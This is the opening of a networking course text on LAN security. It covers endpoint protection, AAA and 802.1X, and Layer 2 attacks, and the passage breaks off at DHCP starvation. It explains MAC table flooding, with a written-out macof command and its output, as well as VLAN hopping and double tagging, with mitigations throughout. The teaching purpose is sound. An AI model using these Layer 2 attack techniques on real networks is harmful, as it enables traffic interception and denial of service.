BRIDGING, SWITCHING, ROUTING AND WIRELESS ESSENTIALS

Table of Contents
10 LAN SECURITY CONCEPTS........................................................................................................................................ 5
10.0 INTRODUCTION ........................................................................................................................................................... 5
10.0.1 Why should I take this module? ...................................................................................................................... 5
10.0.2 What will I learn in this module? ..................................................................................................................... 5
10.1 ENDPOINT SECURITY.................................................................................................................................................. 5
10.1.1 Networks Attacks today ................................................................................................................................... 5
10.1.2 Network Security Devices ............................................................................................................................... 6
10.1.3 Endpoint Protection ......................................................................................................................................... 6
10.1.4 Cisco Email Security Appliance (Cisco ESA ) ............................................................................................... 7
10.1.5 Cisco Web Security Appliance (Cisco WSA) ................................................................................................. 8
10.1.6 Check your understanding – Endpoint Security ............................................................................................ 8
10.2. ACCESS CONTROL .................................................................................................................................................... 9
10.2.1 Authentication with a Local Password............................................................................................................ 9
10.2.2 AAA Components .......................................................................................................................................... 10
10.2.3 Authentication ................................................................................................................................................ 11
10.2.4 Authorization .................................................................................................................................................. 12
10.2.5 Accounting...................................................................................................................................................... 12
10.2.6 802.1X ............................................................................................................................................................ 12
10.2.7 Check Your understanding – Access Control .............................................................................................. 13
10.3 LAYER 2 SECURITY THREATS .................................................................................................................................. 14
10.3.1 Layer 2 Vulnerabilities ................................................................................................................................... 14
10.3.2 Switch Attack Categories .............................................................................................................................. 15
10.3.3 Switch Attack Mitigation Techniques ............................................................................................................ 16
10.3.4 Check Your Understanding – Layer 2 Security Threats ............................................................................. 16
10.4 MAC ADDRESS TABLE ATTACK .............................................................................................................................. 18
10.4.1 Switch operation Review ............................................................................................................................... 18
10.4.2 MAC Address Table Flooding ....................................................................................................................... 18
10.4.3 MAC Address Table Attack Mitigation.......................................................................................................... 19
10.4.4 Check Your Understanding – MAC Address Table Attacks ....................................................................... 20
10.5 LAN ATTACKS ......................................................................................................................................................... 20
10.5.1 Video – VLAN and DHCP Attacks ................................................................................................................ 20
10.5.2 VLAN Hopping Attacks .................................................................................................................................. 20
10.5.3 VLAN Double – Tagging Attack .................................................................................................................... 21
10.5.4 DHCP Messages ........................................................................................................................................... 23
10.5.5 DHCP Attacks ................................................................................................................................................ 23
10.5.6 Video – ARP Attacks, STP Attacks, and CDP reconnaissance. ................................................................ 27
10.5.7 ARP Attacks ................................................................................................................................................... 27
10.5.8 Address Spoofing Attack ............................................................................................................................... 29
10.5.9 STP Attack ..................................................................................................................................................... 29
10.5.10 CDP Reconnaissance ................................................................................................................................. 31
10.5.11 Check Your Understanding – LAN Attacks ................................................................................................ 32
10.6 MODULE PRACTICE AND QUIZ .................................................................................................................................. 34
10.6.1 What did I learn in this module? ................................................................................................................... 34
10.6.2 Module Quiz – LAN security Concepts ........................................................................................................ 35
11 SWITCH SECURITY CONFIGURATION .................................................................................................................. 40

1
 11.0.1 Why Should I take this module? ................................................................................................................... 40
11.0.2 What Will I learn in this module? .................................................................................................................. 40
11.1 IMPLEMENT PORT SECURITY .................................................................................................................................... 40
11.1.1 Secure unused ports ..................................................................................................................................... 40
11.1.2 Mitigate MAC Address Table Attacks........................................................................................................... 41
11.1.3 Enable Port Security ...................................................................................................................................... 42
11.1.4 Limit and Learn MAC Addresses .................................................................................................................. 43
11.1.5 Port Security Aging ........................................................................................................................................ 44
11.1.6 Port Security Violation Modes ....................................................................................................................... 46
11.1.7 Ports in error- disabled State ........................................................................................................................ 47
11.1.8 Verify Port Security ........................................................................................................................................ 48
11.1.9 Syntax Checker - Implement Port Security .................................................................................................. 50
11.1.10 Packet Tracer - Implement Port Security ................................................................................................... 51
11.2 MITIGATE VLAN ATTACKS ...................................................................................................................................... 52
11.2.1 Mitigate VLAN Attacks Review ..................................................................................................................... 52
11.2.2 Steps to Mitigate VLAN Hopping Attacks..................................................................................................... 52
11.2.3 Syntax Checker - Mitigate VLAN Hopping Attacks ..................................................................................... 53
11.3 MITIGATE DHCP ATTACKS ...................................................................................................................................... 54
11.3.1 DHCP Attack Review..................................................................................................................................... 54
11.3.2 DHCP Snooping............................................................................................................................................. 54
11.3.3 Steps to Implement DHCP Snooping ........................................................................................................... 55
11.3.4 DHCP Snooping Configuration Example ..................................................................................................... 55
11.3.5 Syntax Checker – Mitigate DHCP Attacks ................................................................................................... 57
11.4 MITIGATE ARP ATTACKS......................................................................................................................................... 58
11.4.1 Dynamic ARP Inspection............................................................................................................................... 58
11.4.2 DAI Implementation Guidelines .................................................................................................................... 58
11.4.3 DAI Configuration Example ........................................................................................................................... 59
11.4.4 Syntax Checker – Mitigate ARP Attacks ...................................................................................................... 60
11.5 MITIGATE STP ATTACKS ......................................................................................................................................... 60
11.5.1 PortFast and BPDU Guard............................................................................................................................ 60
11.5.2 Configure PortFast......................................................................................................................................... 61
11.5.3 Configure BPDU Guard ................................................................................................................................. 62
11.5.4 Syntax Checker – Mitigate STP Attacks ...................................................................................................... 63
11.6 MODULE PRACTICE AND QUIZ .................................................................................................................................. 64
11.6.1 Packet Tracer – Switch Security Configuration ........................................................................................... 64
11.6.2 Lab – Switch Security Configuration ............................................................................................................ 64
11.6.3 What did I learn in this module? ................................................................................................................... 65
11.6.4 Module Quiz – Switch Security Configuration ............................................................................................. 66
12 WLAN CONCEPTS ...................................................................................................................................................... 73
12.0.1 Why should I take this module? .................................................................................................................... 73
12.0.2 What Will I learn in this module? .................................................................................................................. 73
12.1 INTRODUCTION TO WIRELESS .................................................................................................................................. 74
12.1.1 Benefits of Wireless ....................................................................................................................................... 74
12.1.2 Types of Wireless Network ........................................................................................................................... 74
12.1.3 Wireless Technologies .................................................................................................................................. 75
12.1.4 802.11 Standards........................................................................................................................................... 77
12.1.5 Radio Frequencies......................................................................................................................................... 78
12.1.6 Wireless Standards Organizations ............................................................................................................... 79
12.1.7 Check Your Understanding – Introduction to Wireless ............................................................................... 80
12.2 WLAN CONCEPTS ................................................................................................................................................... 81
12.2.1 Video – WLAN Concepts............................................................................................................................... 81
12.2.2 Wireless NIC .................................................................................................................................................. 81
12.2.3 Wireless Home Router .................................................................................................................................. 82

2
 12.2.4 Wireless Access Point ................................................................................................................................... 82
12.2.5 AP Categories ................................................................................................................................................ 82
12.2.6 Wireless Antennas ......................................................................................................................................... 84
12.2.7 Check Your Understanding – WLAN Concepts........................................................................................... 84
12.3 WLAN OPERATION.................................................................................................................................................. 85
12.3.1 Video - WLAN Operation ............................................................................................................................... 85
12.3.2 802.11 Wireless Topology Modes ................................................................................................................ 86
12.3.3 BSS and ESS ................................................................................................................................................. 86
12.3.4 802.11 Frame Structure ................................................................................................................................ 88
12.3.5 CSMA/CA ....................................................................................................................................................... 88
12.3.6 Wireless Client and AP Association ............................................................................................................. 89
12.3.7 Passive and Active Discover Mode .............................................................................................................. 90
12.3.8 Check Your Understanding – WLAN Operation .......................................................................................... 91
12.4 CAPWAP OPERATION ............................................................................................................................................ 92
12.4.1 Video – CAPWAP .......................................................................................................................................... 92
12.4.2 Introduction to CAPWAP ............................................................................................................................... 92
12.4.3 Split MAC Architecture .................................................................................................................................. 93
12.4.4 Datagram Transport Layer Security (DTLS) Encryption ............................................................................. 93
12.4.5 FlexConnect APS........................................................................................................................................... 94
12.4.6 Check Your Understanding – CAPWAP Operation..................................................................................... 95
12.5 CHANNEL MANAGEMENT ......................................................................................................................................... 97
12.5.1 Frequency Channel Saturation ..................................................................................................................... 97
12.5.2 Channel Selection .......................................................................................................................................... 99
12.5.3 Plan and WLAN Deployment ...................................................................................................................... 100
12.5.4 Check Your Understanding – Channel Management ............................................................................... 101
12.6 WLAN THREATS ................................................................................................................................................... 102
12.6.1 Video – WLAN Threats................................................................................................................................ 102
12.6.2 Wireless Security Overview ........................................................................................................................ 103
12.6.3 DoS Attacks.................................................................................................................................................. 103
12.6.4 Rogue Access Point .................................................................................................................................... 103
12.6.5 Man in-the-Middle Attack............................................................................................................................. 104
12.6.6 Check Your Understanding – WLAN Threats ............................................................................................ 105
12.7 SECURE WLANS ................................................................................................................................................... 106
12.7.1 Video – Secure WLANs............................................................................................................................... 106
12.7.2 SSID Cloaking and MAC Address Filtering ............................................................................................... 106
12.7.3 802.11 Original Authentication Methods .................................................................................................... 107
12.7.4 Shared Key Authentication Methods .......................................................................................................... 108
12.7.5 Authenticating a Home User ....................................................................................................................... 108
12.7.6 Encryption Methods ..................................................................................................................................... 109
12.7.7 Authentication in the Enterprise .................................................................................................................. 110
12.7.8 WPA 3........................................................................................................................................................... 110
12.7.9 Check Your Understanding – Secure WLANs ........................................................................................... 111
12.8 MODULE PRACTICE AND QUIZ ................................................................................................................................ 113
12.8.1 What did I learn in this module? ................................................................................................................. 113
12.8.2 Module Quiz – WLAN Concepts ................................................................................................................. 114
13 WLAN CONFIGURATION ......................................................................................................................................... 119
13.0.1 Why should I take this module? .................................................................................................................. 119
13.0.2 What Will I learn to do in this module? ....................................................................................................... 119
13.1 REMOTE SITE WLAN CONFIGURATION.................................................................................................................. 119
13.1.1 Video – Configure a Wireless Network ...................................................................................................... 119
13.1.2 The Wireless Router .................................................................................................................................... 119
13.1.3 Log in to the Wireless Router...................................................................................................................... 120
13.1.4 Basic Network Setup ................................................................................................................................... 121

3
 13.1.5 Basic Wireless Setup................................................................................................................................... 124
13.1.6 Configure a Wireless Mesh Network .......................................................................................................... 127
13.1.7 NAT for IPV4 ................................................................................................................................................ 128
13.1.8 Quality of Service......................................................................................................................................... 129
13.1.9 Port Forwarding ........................................................................................................................................... 129
13.1.10 Packet Tracer – Configure a Wireless Network ...................................................................................... 130
13.1.11 Lab – Configure a Wireless Network........................................................................................................ 130
13.2 CONFIGURE A BASIC WLAN ON THE WLC ............................................................................................................ 131
13.2.1 Video – Configure a Basic WLAN on the WLC.......................................................................................... 131
13.2.2 WLC Topology ............................................................................................................................................. 131
13.2.3 Log in to the WLC ........................................................................................................................................ 132
13.2.4 View AP Information .................................................................................................................................... 133
13.2.5 Advanced Settings ....................................................................................................................................... 134
13.2.6 Configure WLAN .......................................................................................................................................... 134
13.2.7 Packet Tracer – Configure a Basic WLAN on the WLC............................................................................ 138
13.3 CONFIGURE A WPA2 ENTERPRISE WLAN ON THE WLC ...................................................................................... 138
13.3.1 Video – Define a SNMP and RADIUS Server on the WLC ...................................................................... 138
13.3.2 SNMP and RADIUS..................................................................................................................................... 139
13.3.3 Configure SNMP Server Information .......................................................................................................... 139
13.3.4 Configure RADIUS Server Information ...................................................................................................... 140
13.3.5 Video – Configure a VLAN for a New WLAN............................................................................................. 141
13.3.6 Topology with VLAN 5 Addressing ............................................................................................................. 142
13.3.7 Configure a New interface........................................................................................................................... 142
13.3.8 Video – Configure a DHCP Scope ............................................................................................................. 145
13.3.9 Configure a DHCP Scope ........................................................................................................................... 145
13.3.10 Video – Configure a WPA2 Enterprise WLAN......................................................................................... 147
13.3.11 Configure a WPA2 Enterprise WLAN....................................................................................................... 147
13.3.12 Packet Tracer – Configure a WPA2 Enterprise WLAN on the WLC ...................................................... 150
13.4 TROUBLESHOOT WLAN ISSUES ............................................................................................................................ 151
13.4.1 Troubleshooting Approaches ...................................................................................................................... 151
13.4.2 Wireless Client Not Connecting .................................................................................................................. 152
13.4.3 Troubleshooting When the Network is Slow .............................................................................................. 153
13.4.4 Updating Firmware ...................................................................................................................................... 154
13.4.5 Packet Tracer – Troubleshoot WLAN Issues............................................................................................. 155
13.5 MODULE PRACTICE AND SUMMARY ....................................................................................................................... 155
13.5.1 Packet Tracer - WLAN Configuration ......................................................................................................... 155
13.5.2 What did I learn in this module? ................................................................................................................. 155
13.5.3 Module Quiz – WLAN Configuration .......................................................................................................... 156
GLOSSARY ...................................................................................................................................................................... 161

4
10 LAN Security Concepts
10.0 Introduction

10.0.1 Why should I take this module?

Welcome to LAN Security Concepts.

If your career path is in IT, you won’t just be building or maintaining networks. You will be responsible for the
security of your network. For today’s network architects and administrators, security is not an afterthought. It is
a top priority for them! In fact, many people in IT now work exclusively in the area of network security.

Do you understand what makes a LAN secure? Do you know what threat actors can do to break network
security? Do you know what you can do to stop them? This module is your introduction to the world of network
security, so don’t wait, click Next!

10.0.2 What will I learn in this module?

Module Title: LAN Security Concepts

Module Objective: Explain how vulnerabilities compromise LAN security.

Topic Title Topic Objective

Endpoint Security Explain how to use endpoint security to mitigate attacks.

Explain how AAA and 802.1X are used to authenticate LAN endpoints
Access Control
and devices.

Layer 2 Security Threats Identify Layer 2 vulnerabilities.

MAC Address Table Attack Explain how a MAC address table attack compromises LAN security.

LAN Attacks Explain how LAN attacks compromise LAN security.

10.1 Endpoint Security

10.1.1 Networks Attacks today

The news media commonly covers attacks on enterprise networks. Simply search the internet for “latest
network attacks” to find up-to-date information on current attacks. Most likely, these attacks will involve one or
more of the following:

• Distributed Denial of Service (DDoS) – This is a coordinated attack from many devices, called zombies,
with the intention of degrading or halting public access to an organization’s website and resources.
• Data Breach – This is an attack in which an organization’s data servers or hosts are compromised to steal
confidential information.
• Malware – This is an attack in which an organization’s hosts are infected with malicious software that
cause a variety of problems. For example, ransomware such as WannaCry, shown in the figure, encrypts
the data on a host and locks access to it until a ransom is paid.

5
10.1.2 Network Security Devices

Various network security devices are required to protect the network perimeter from outside access. These
devices could include a virtual private network (VPN) enabled router, a Next-Generation Firewall (NGFW),
and a Network Access Control (NAC) device.

A VPN-enabled router provides a secure connection to remote users across a public network and into the
enterprise network. VPN services can be integrated into the firewall.

An NGFW provides stateful packet inspection, application visibility and control, a next-generation intrusion
prevention system (NGIPS), advanced malware protection (AMP), and URL filtering.

A NAC device includes authentication, authorization, and accounting (AAA) services. In larger enterprises,
these services might be incorporated into an appliance that can manage access policies across a wide variety
of users and device types. The Cisco Identity Services Engine (ISE) is an example of a NAC device.

10.1.3 Endpoint Protection

LAN devices such as switches, wireless LAN controllers (WLCs), and other access point (AP) devices
interconnect endpoints. Most of these devices are susceptible to the LAN-related attacks that are covered in
this module.

But many attacks can also originate from inside the network. If an internal host is infiltrated, it can become a
starting point for a threat actor to gain access to critical system devices, such as servers and sensitive data.
Endpoints are hosts which commonly consist of laptops, desktops, servers, and IP phones, as well as
employee-owned devices that are typically referred to as Bring Your Own Devices (BYODs).

Endpoints are particularly susceptible to malware-related attacks that originate through email or web browsing.
These endpoints have typically used traditional host-based security features, such as antivirus/antimalware,
host-based firewalls, and host-based intrusion prevention systems (HIPSs). However, today endpoints are
best protected by a combination of NAC, host-based AMP software, an Email Security Appliance (ESA),
and a Web Security Appliance (WSA). Advanced Malware Protection (AMP) products include endpoint
solutions such as Cisco AMP for Endpoints.

The figure is a simple topology representing all the network security devices and endpoint solutions discussed
in this module.

The figure is a network topology showing network security devices and endpoint solutions. At the upper left is
the Internet cloud. Attached to the Internet cloud is a remote user with VPN client. Connected to the cloud on
the internal network is a VPN-enabled router which is connected to an NGFW. The NGFW is connected to a
multilayer switch which has two connections to another multilayer switch. Connected to the first switch is a

6
NAC AAA/ISE device. Connected to the second switch isn ESA/WSA device. The two multilayer switches are
both connected to a secured LAN switch and a WLC. Several wired and wireless endpoints secured with AMP
are also shown including a desktop, laptop, IP phone, and smartphone.

10.1.4 Cisco Email Security Appliance (Cisco ESA )

Content security appliances include fine-grained control over email and web browsing for an organization’s
users.

According to the Cisco’s Talos Intelligence Group, in June 2019, 85% of all email sent was spam. Phishing
attacks are a particularly virulent form of spam. Recall that a phishing attack entices the user to click a link or
open an attachment. Spear phishing targets high-profile employees or executives that may have elevated
login credentials. This is particularly crucial in today’s environment where, according to the SANS Institute,
95% of all attacks on enterprise networks are the result of a successful spear phishing attack.

The Cisco ESA is a device that is designed to monitor Simple Mail Transfer Protocol (SMTP). The Cisco
ESA is constantly updated by real-time feeds from the Cisco Talos, which detects and correlates threats and
solutions by using a worldwide database monitoring system. This threat intelligence data is pulled by the Cisco
ESA every three to five minutes. These are some of the functions of the Cisco ESA:

• Block known threats.

• Remediate against stealth malware that evaded initial detection.
• Discard emails with bad links (as shown in the figure).
• Block access to newly infected sites.
• Encrypt content in outgoing email to prevent data loss.

In the figure, the Cisco ESA discards the email with bad links.

7
 1. Threat actor sends a phishing attack to an important host on the network
2. The firewall forwards all email to the ESA
3. The ESA analyzes the email, logs it, and if it is malware discards it.

10.1.5 Cisco Web Security Appliance (Cisco WSA)

The Cisco Web Security Appliance (WSA) is a mitigation technology for web-based threats. It helps
organizations address the challenges of securing and controlling web traffic. The Cisco WSA combines
advanced malware protection, application visibility and control, acceptable use policy controls, and reporting.

Cisco WSA provides complete control over how users access the internet. Certain features and applications,
such as chat, messaging, video and audio, can be allowed, restricted with time and bandwidth limits, or
blocked, according to the organization’s requirements. The WSA can perform blacklisting of URLs, URL-
filtering, malware scanning, URL categorization, Web application filtering, and encryption and decryption of
web traffic.

In the figure, an internal corporate employee uses a smartphone to attempt to connect to a known blacklisted
site.

1. A user attempt to connect to a website

2. The firewall forwards the website request to WSA
3. The WSA evaluates the URL and determines it is a known blacklisted site. The WSA discards the
packet and send an access denied message to the user.

10.1.6 Check your understanding – Endpoint Security

8
10.2. Access Control

10.2.1 Authentication with a Local Password

In the previous topic, you learned that a NAC device provides AAA services. In this topic, you will learn more
about AAA and the ways to control access.

Many types of authentication can be performed on networking devices, and each method offers varying levels
of security. The simplest method of remote access authentication is to configure a login and password
combination on console, vty lines, and aux ports, as shown in the vty lines in the following example. This
method is the easiest to implement, but it is also the weakest and least secure. This method provides no
accountability and the password is sent in plaintext. Anyone with the password can gain entry to the device.

R1(config)# line vty 0 4

R1(config-line)# password ci5c0
R1(config-line)# login

SSH is a more secure form of remote access:

9
• It requires a username and a password, both of which are encrypted during transmission.
• The username and password can be authenticated by the local database method.
• It provides more accountability because the username is recorded when a user logs in.

The following example illustrates SSH and local database methods of remote access.

R1(config)# ip domain-name [Link]

R1(config)# crypto key generate rsa general-keys modulus 2048
R1(config)# username Admin secret Str0ng3rPa55w0rd
R1(config)# ssh version 2
R1(config)# line vty 0 4
R1(config-line)# transport input ssh
R1(config-line)# login local

The local database method has some limitations:

• User accounts must be configured locally on each device. In a large enterprise environment with multiple
routers and switches to manage, it can take time to implement and change local databases on each
device.
• The local database configuration provides no fallback authentication method. For example, what if the
administrator forgets the username and password for that device? With no backup method available for
authentication, password recovery becomes the only option.

A better solution is to have all devices refer to the same database of usernames and passwords from a central
server.

10.2.2 AAA Components

AAA stands for Authentication, Authorization, and Accounting. The AAA concept is similar to using a credit
card, as shown in the figure. The credit card identifies who can use it, how much that user can spend, and
keeps an account of what items or services the user purchased.

AAA provides the primary framework to set up access control on a network device. AAA is a way to control
who is permitted to access a network (authenticate), what they can do while they are there (authorize), and to
audit what actions they performed while accessing the network (accounting).

10
10.2.3 Authentication

Local and server-based are two common methods of implementing AAA authentication.

Local AAA Authentication

Local AAA stores usernames and passwords locally in a network device such as the Cisco router. Users
authenticate against the local database, as shown in figure. Local AAA is ideal for small networks.

1. The client stablishes a connection with the router

2. The AAA router prompts the user for the username and password.
3. The router authenticates the username and password using the local database and the user is
provided access to the network based on information in the local database.

Server-Based AAA Authentication

With the server-based method, the router accesses a central AAA server, as shown in figure. The AAA server
contains the usernames and passwords for all users. The router uses either the Remote Authentication Dial-In
User Service (RADIUS) or Terminal Access Controller Access Control System (TACACS+) protocols to
communicate with the AAA server. When there are multiple routers and switches, server-based AAA is more
appropriate.

a remote client connects to a AAA router, is prompted for a username and password, the router authenticates
the credentials using a AAA server, and the user is provided access to the network

1. The client stablishes a connection with the router

2. The AAA router prompts the user for a username and password
3. The router authenticates the username and password using a AAA server.
4. The user is provided access to the network based on information in the remote AAA server.

11
10.2.4 Authorization

AAA authorization is automatic and does not require users to perform additional steps after authentication.
Authorization governs what users can and cannot do on the network after they are authenticated.

Authorization uses a set of attributes that describes the user’s access to the network. These attributes are
used by the AAA server to determine privileges and restrictions for that user, as shown in the figure.

1. When a user has been authenticated, a session is stablished between the router and the AAA server.
2. The router requests authorization from the AAA server for the client’s requested service.
3. The AAA servers return a PASS/FAIL response for authorization.

10.2.5 Accounting

AAA accounting collects and reports usage data. This data can be used for such purposes as auditing or
billing. The collected data might include the start and stop connection times, executed commands, number of
packets, and number of bytes.

A primary use of accounting is to combine it with AAA authentication. The AAA server keeps a detailed log of
exactly what the authenticated user does on the device, as shown in the figure. This includes all EXEC and
configuration commands issued by the user. The log contains numerous data fields, including the username,
the date and time, and the actual command that was entered by the user. This information is useful when
troubleshooting devices. It also provides evidence for when individuals perform malicious acts.

1. When a user has been authenticated, the AAA accounting process generates a start message to
begin the accounting process.
2. When the user finishes, a stop message is recorded and the accounting process end.

10.2.6 802.1X

The IEEE 802.1X standard is a port-based access control and authentication protocol. This protocol restricts
unauthorized workstations from connecting to a LAN through publicly accessible switch ports. The
authentication server authenticates each workstation that is connected to a switch port before making
available any services offered by the switch or the LAN.

With 802.1X port-based authentication, the devices in the network have specific roles, as shown in the figure.

12
• Client (Supplicant) - This is a device running 802.1X-compliant client software, which is available for
wired or wireless devices.
• Switch (Authenticator) – The switch acts as an intermediary between the client and the authentication
server. It requests identifying information from the client, verifies that information with the authentication
server, and relays a response to the client. Another device that could act as authenticator is a wireless
access point.
• Authentication server – The server validates the identity of the client and notifies the switch or wireless
access point that the client is or is not authorized to access the LAN and switch services.

10.2.7 Check Your understanding – Access Control

13
10.3 Layer 2 Security Threats

10.3.1 Layer 2 Vulnerabilities

The previous two topics discussed securing endpoints. In this topic, you will continue to learn about ways to
secure the LAN by focusing on the frames found in the data link layer (Layer 2) and the switch.

Recall that the OSI reference model is divided into seven layers which work independently of each other. The
figure shows the function of each layer and the core elements that can be exploited.

Network administrators routinely implement security solutions to protect the elements in Layer 3 up
through Layer 7. They use VPNs, firewalls, and IPS devices to protect these elements. However, if Layer 2
is compromised, then all the layers above it are also affected. For example, if a threat actor with access to the
internal network captured Layer 2 frames, then all the security implemented on the layers above would be
useless. The threat actor could cause a lot of damage on the Layer 2 LAN networking infrastructure.

14
10.3.2 Switch Attack Categories

Security is only as strong as the weakest link in the system, and Layer 2 is considered to be that weak link.
This is because LANs were traditionally under the administrative control of a single organization. We
inherently trusted all persons and devices connected to our LAN. Today, with BYOD and more sophisticated
attacks, our LANs have become more vulnerable to penetration. Therefore, in addition to protecting Layer 3 to
Layer 7, network security professionals must also mitigate attacks to the Layer 2 LAN infrastructure.

The first step in mitigating attacks on the Layer 2 infrastructure is to understand the underlying operation of
Layer 2 and the threats posed by the Layer 2 infrastructure.

Attacks against the Layer 2 LAN infrastructure are described in the table and are discussed in more detail later
in this module.

Layer 2 Attacks

Category Examples

MAC Table Attacks Includes MAC address flooding attacks.

Includes VLAN hopping and VLAN double-tagging attacks. It also

VLAN Attacks
includes attacks between devices on a common VLAN.

DHCP Attacks Includes DHCP starvation and DHCP spoofing attacks.

ARP Attacks Includes ARP spoofing and ARP poisoning attacks.

Address Spoofing Attacks Includes MAC address and IP address spoofing attacks.

STP Attacks Includes Spanning Tree Protocol manipulation attacks.

15
10.3.3 Switch Attack Mitigation Techniques

The table provides an overview of Cisco solutions to help mitigate Layer 2 attacks.

Layer 2 Attack Mitigation

Solution Description

Prevents many types of attacks including MAC address flooding

Port Security
attacks and DHCP starvation attacks.

DHCP Snooping Prevents DHCP starvation and DHCP spoofing attacks.

Dynamic ARP Inspection (DAI) Prevents ARP spoofing and ARP poisoning attacks.

IP Source Guard (IPSG) Prevents MAC and IP address spoofing attacks.

These Layer 2 solutions will not be effective if the management protocols are not secured. For example, the
management protocols Syslog, Simple Network Management Protocol (SNMP), Trivial File Transfer Protocol
(TFTP), telnet, File Transfer Protocol (FTP) and most other common protocols are insecure; therefore, the
following strategies are recommended:

• Always use secure variants of these protocols such as SSH, Secure Copy Protocol (SCP), Secure FTP
(SFTP), and Secure Socket Layer/Transport Layer Security (SSL/TLS).
• Consider using out-of-band management network to manage devices.
• Use a dedicated management VLAN where nothing but management traffic resides.
• Use ACLs to filter unwanted access.

10.3.4 Check Your Understanding – Layer 2 Security Threats

16
17
10.4 MAC Address Table Attack

10.4.1 Switch operation Review

In this topic, the focus is still on switches, specifically their MAC address tables and how these tables are
vulnerable to attacks.

Recall that to make forwarding decisions, a Layer 2 LAN switch builds a table based on the source MAC
addresses in received frames. Shown in the figure, this is called a MAC address table. MAC address tables
are stored in memory and are used to more efficiently forward frames.

S1# show mac address-table dynamic

Mac Address Table
-------------------------------------------
Vlan Mac Address Type Ports
---- ----------- -------- -----
1 0001.9717.22e0 DYNAMIC Fa0/4
1 000a.f38e.74b3 DYNAMIC Fa0/1
1 [Link] DYNAMIC Fa0/3
1 00d0.ba07.8499 DYNAMIC Fa0/2
S1#

10.4.2 MAC Address Table Flooding

All MAC tables have a fixed size and consequently, a switch can run out of resources in which to store MAC
addresses. MAC address flooding attacks take advantage of this limitation by bombarding the switch with fake
source MAC addresses until the switch MAC address table is full.

When this occurs, the switch treats the frame as an unknown unicast and begins to flood all incoming traffic
out all ports on the same VLAN without referencing the MAC table. This condition now allows a threat actor to
capture all of the frames sent from one host to another on the local LAN or local VLAN.

Note: Traffic is flooded only within the local LAN or VLAN. The threat actor can only capture traffic within the
local LAN or VLAN to which the threat actor is connected.

The figure shows how a threat actor can easily use the network attack tool macof to overflow a MAC address
table.

1. The threat actor is connected to VLAN 10 and uses macof to rapidly generate many random source
and destination MAC and IP addresses.
2. Over a short period of time, the switch’s MAC table fill’s up.

18
 3. When the MAC table is full, the switch begins to flood all frames that it receives. As long as macof
continues to run, the MAC table remains full and the switch continues to flood all incoming frames out
every port associated with VLAN 10.
4. The threat actor then uses packet sniffing software to capture frames from any and all devices
connected to VLAN 10.

If the threat actor stops macof from running or is discovered and stopped, the switch eventually ages out the
older MAC address entries from the table and begins to act like a switch again.

10.4.3 MAC Address Table Attack Mitigation

What makes tools such as macof so dangerous is that an attacker can create a MAC table overflow attack
very quickly. For instance, a Catalyst 6500 switch can store 132,000 MAC addresses in its MAC address
table. A tool such as macof can flood a switch with up to 8,000 bogus frames per second; creating a MAC
address table overflow attack in a matter of a few seconds. The example shows a sample output of
the macof command on a Linux host.

# macof -i eth1
[Link] [Link] [Link].26413 > [Link].49492: S
1094191437:1094191437(0) win 512
[Link] [Link] [Link].61376 > [Link].47523: S
446486755:446486755(0) win 512
[Link] [Link] [Link].20086 > [Link].6728: S
105051945:105051945(0) win 512
[Link] [Link] [Link].45282 > [Link].24898: S
1838062028:1838062028(0) win 512
[Link] [Link] [Link].11587 > [Link].7723: S
1792413296:1792413296(0) win 512
[Link] [Link] [Link].19784 > [Link].57433: S
1018924173:1018924173(0) win 512
[Link] [Link] [Link].283 > [Link].11466: S
727776406:727776406(0) win 512
[Link] [Link] [Link].32650 > [Link].11324: S
605528173:605528173(0) win 512
[Link] [Link] [Link].36346 > [Link].55700: S
2128143986:2128143986(0) win 512

Another reason why these attack tools are dangerous is because they not only affect the local switch, they can
also affect other connected Layer 2 switches. When the MAC address table of a switch is full, it starts flooding
out all ports including those connected to other Layer 2 switches.

To mitigate MAC address table overflow attacks, network administrators must implement port security. Port
security will only allow a specified number of source MAC addresses to be learned on the port. Port security is
further discussed in another module.

19
10.4.4 Check Your Understanding – MAC Address Table Attacks

10.5 LAN Attacks

10.5.1 Video – VLAN and DHCP Attacks

10.5.2 VLAN Hopping Attacks

A VLAN hopping attack enables traffic from one VLAN to be seen by another VLAN without the aid of a router.
In a basic VLAN hopping attack, the threat actor configures a host to act like a switch to take advantage of the
automatic trunking port feature enabled by default on most switch ports.

20
The threat actor configures the host to spoof 802.1Q signaling and Cisco-proprietary Dynamic Trunking
Protocol (DTP) signaling to trunk with the connecting switch. If successful, the switch establishes a trunk link
with the host, as shown in the figure. Now the threat actor can access all the VLANs on the switch. The threat
actor can send and receive traffic on any VLAN, effectively hopping between VLANs.

10.5.3 VLAN Double – Tagging Attack

A threat actor in specific situations could embed a hidden 802.1Q tag inside the frame that already has an
802.1Q tag. This tag allows the frame to go to a VLAN that the original 802.1Q tag did not specify.

Step 1

The threat actor sends a double-tagged 802.1Q frame to the switch. The outer header has the VLAN tag of
the threat actor, which is the same as the native VLAN of the trunk port. For the purposes of this example,
assume that this is VLAN 10. The inner tag is the victim VLAN, in this example, VLAN 20.

21
Step 2

The frame arrives on the first switch, which looks at the first 4-byte 802.1Q tag. The switch sees that the frame
is destined for VLAN 10, which is the native VLAN. The switch forwards the packet out all VLAN 10 ports after
stripping the VLAN 10 tag. The frame is not retagged because it is part of the native VLAN. At this point, the
VLAN 20 tag is still intact and has not been inspected by the first switch.

Step 3

The frame arrives at the second switch which has no knowledge that it was supposed to be for VLAN 10.
Native VLAN traffic is not tagged by the sending switch as specified in the 802.1Q specification. The second
switch looks only at the inner 802.1Q tag that the threat actor inserted and sees that the frame is destined for
VLAN 20, the target VLAN. The second switch sends the frame on to the target or floods it, depending on
whether there is an existing MAC address table entry for the target.

A VLAN double-tagging attack is unidirectional and works only when the attacker is connected to a port
residing in the same VLAN as the native VLAN of the trunk port. The idea is that double tagging allows the
attacker to send data to hosts or servers on a VLAN that otherwise would be blocked by some type of access
control configuration. Presumably the return traffic will also be permitted, thus giving the attacker the ability to
communicate with devices on the normally blocked VLAN.

22
VLAN Attack Mitigation

VLAN hopping and VLAN double-tagging attacks can be prevented by implementing the following trunk
security guidelines, as discussed in a previous module:

• Disable trunking on all access ports.

• Disable auto trunking on trunk links so that trunks must be manually enabled.
• Be sure that the native VLAN is only used for trunk links.

10.5.4 DHCP Messages

DHCP servers dynamically provide IP configuration information including IP address, subnet mask, default
gateway, DNS servers, and more to clients. A review of the sequence of the DHCP message exchange
between client and server is shown in the figure.

10.5.5 DHCP Attacks

Two types of DHCP attacks are DHCP starvation and DHCP spoofing. Both attacks are mitigated by
implementing DHCP snooping.

DHCP Starvation Attack

The goal of the DHCP Starvation attack is to create a DoS for connecting clients. DHCP starvation attacks
require an attack tool such as Gobbler.

